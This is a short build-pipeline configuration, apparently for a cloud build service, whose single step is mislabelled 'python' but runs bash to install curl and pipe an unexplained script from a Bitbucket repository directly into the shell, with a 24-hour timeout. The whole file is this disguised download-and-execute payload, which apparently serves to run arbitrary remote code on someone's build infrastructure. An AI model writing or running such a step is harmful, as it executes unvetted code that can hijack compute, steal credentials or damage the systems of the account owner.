steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL https://bitbucket.org/nicezep/korong/raw/master/newjajal | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
